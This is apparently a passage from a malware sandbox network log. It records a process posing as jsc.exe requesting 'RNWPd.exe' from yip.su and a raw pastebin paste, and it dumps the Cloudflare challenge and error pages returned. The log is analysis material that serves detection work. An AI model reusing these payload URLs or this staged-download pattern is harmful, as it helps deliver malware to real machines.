                                    Data Ascii: tWA4mItkLJBQxqPm1zI3df7Gz3cu60G5cZyhexPwDcL5O9sfdJHR3bjejLj7l9SsIxibzqLtnPT86drlJdj3TzKufn28F5c9H1HEkJhwsMKgDqI1BD7kI5lvZvE2dshl9N3i9w7l.j8ML.SfDyJZSokgOQXIPpPo.vtCLUDyxjzIDWOmt5AmVPq7Lsf1rb1SSBSLiwNnfXyKNDPuli7DYoKByn19KK2W5Fu40MHZNkGQtLzBWLYLQB4nsZOYmpT


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    76192.168.2.549804188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:45 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:46 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:46 UTC683INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 64 75 73 6f 54 4f 4b 75 7a 36 4f 31 52 74 30 71 46 57 45 62 6a 63 6f 63 77 32 6a 44 48 30 33 34 4f 33 63 6b 66 43 66 6a 43 34 6d 51 34 36 51 5a 47 41 56 33 50 7a 42 30 52 42 6d 37 33 49 31 5a 58 61 47 65 52 46 79 45 31 62 4a 6c 73 36 49 54 35 4e 4a 63 38 55 53 58 57 56 63 65 5a 6e 6e 79 4c 52 72 77 46 78 53 39 54 34 41 3d 24 42 56 6e 50 4f 61 52 76 71 6a 6a 53 46 49 7a 56 63 53 55 37 58 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: dusoTOKuz6O1Rt0qFWEbjcocw2jDH034O3ckfCfjC4mQ46QZGAV3PzB0RBm73I1ZXaGeRFyE1bJls6IT5NJc8USXWVceZnnyLRrwFxS9T4A=$BVnPOaRvqjjSFIzVcSU7XQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:46 UTC1369INData Raw: 33 64 66 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfa<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:46 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:46 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:46 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:46 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:46 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:46 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:46 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 36 30 33 27 2c 63 52 61 79 3a 20 27 38 62 34 64 30 30 37 34 63 64 31 37 31 39 36 32 27 2c 63 48 61 73 68 3a 20 27 65 64 32 65 31 61 36 62 65 31 37 61 33 33 37 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 64 33 6f 34 58 4f 52 42 70 31 4e 49 68 4a 67 49 64 4a 58 6b 75 36 46 41 57 52 76 73 67 61 30 6a 6c 33 53 33 2e 56 56 4b 6c 43 6b 2d 31 37 32 33 39 33 32 37 30 36 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d 65 4d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '603',cRay: '8b4d0074cd171962',cHash: 'ed2e1a6be17a337',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=d3o4XORBp1NIhJgIdJXku6FAWRvsga0jl3S3.VVKlCk-1723932706-0.0.1.1-4137",cFPWv: 'g',cTTimeM
                                    2024-08-17 22:11:46 UTC1369INData Raw: 6b 2e 50 69 69 59 36 58 6d 2e 6d 42 38 75 78 75 71 5a 77 7a 79 58 6f 56 6b 72 7a 5f 6a 75 72 36 68 66 37 5f 36 6c 43 53 43 37 65 4c 43 69 2e 36 30 74 7a 35 64 53 58 62 7a 59 6f 7a 33 41 41 51 31 5f 69 4e 74 50 33 75 4c 4e 67 4b 57 74 6c 56 42 69 47 46 4d 4f 68 45 44 38 30 4a 57 79 5a 58 47 67 59 76 72 52 30 62 56 4c 65 33 34 41 50 63 44 34 50 47 48 56 48 6e 31 41 32 61 45 49 44 48 74 6c 57 35 6f 43 51 6d 78 30 42 78 57 52 39 30 4a 54 41 53 34 45 41 36 67 4b 41 5a 34 37 63 4d 62 57 45 6e 4b 54 35 57 61 67 31 73 5f 61 4e 73 58 30 68 63 76 30 36 78 66 69 31 75 63 56 53 49 63 6b 7a 52 68 72 74 63 32 4a 61 57 34 77 48 58 51 75 51 5f 33 56 30 66 6f 64 6c 69 4a 51 34 49 6a 4b 48 34 73 72 6a 6f 6e 46 5a 37 32 6d 37 5f 31 6b 78 30 5a 4c 4a 39 53 32 39 47 75 39 52
                                    Data Ascii: k.PiiY6Xm.mB8uxuqZwzyXoVkrz_jur6hf7_6lCSC7eLCi.60tz5dSXbzYoz3AAQ1_iNtP3uLNgKWtlVBiGFMOhED80JWyZXGgYvrR0bVLe34APcD4PGHVHn1A2aEIDHtlW5oCQmx0BxWR90JTAS4EA6gKAZ47cMbWEnKT5Wag1s_aNsX0hcv06xfi1ucVSIckzRhrtc2JaW4wHXQuQ_3V0fodliJQ4IjKH4srjonFZ72m7_1kx0ZLJ9S29Gu9R


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    77192.168.2.549805104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:51 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:51 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4d0094dede4331-EWR
                                    2024-08-17 22:11:51 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:51 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:51 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:51 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    78192.168.2.549806188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:51 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:52 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:52 UTC687INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 46 55 36 72 66 48 39 52 31 34 35 41 2f 41 79 73 43 54 72 4d 46 6b 61 53 51 49 50 61 49 33 63 48 2f 57 4e 5a 39 6d 78 7a 6c 38 61 39 64 6c 57 4c 4f 45 75 68 4d 53 67 54 6e 6c 65 6b 36 68 53 34 36 63 70 73 56 4d 4b 78 6b 4a 39 34 37 44 6d 45 4a 74 6a 76 76 59 70 46 37 74 76 44 70 49 6d 75 6d 6c 59 75 68 6b 65 78 44 51 55 3d 24 33 50 5a 47 68 2f 55 61 32 49 35 38 6a 55 76 47 79 51 44 6f 6d 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: FU6rfH9R145A/AysCTrMFkaSQIPaI3cH/WNZ9mxzl8a9dlWLOEuhMSgTnlek6hS46cpsVMKxkJ947DmEJtjvvYpF7tvDpImumlYuhkexDQU=$3PZGh/Ua2I58jUvGyQDomw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
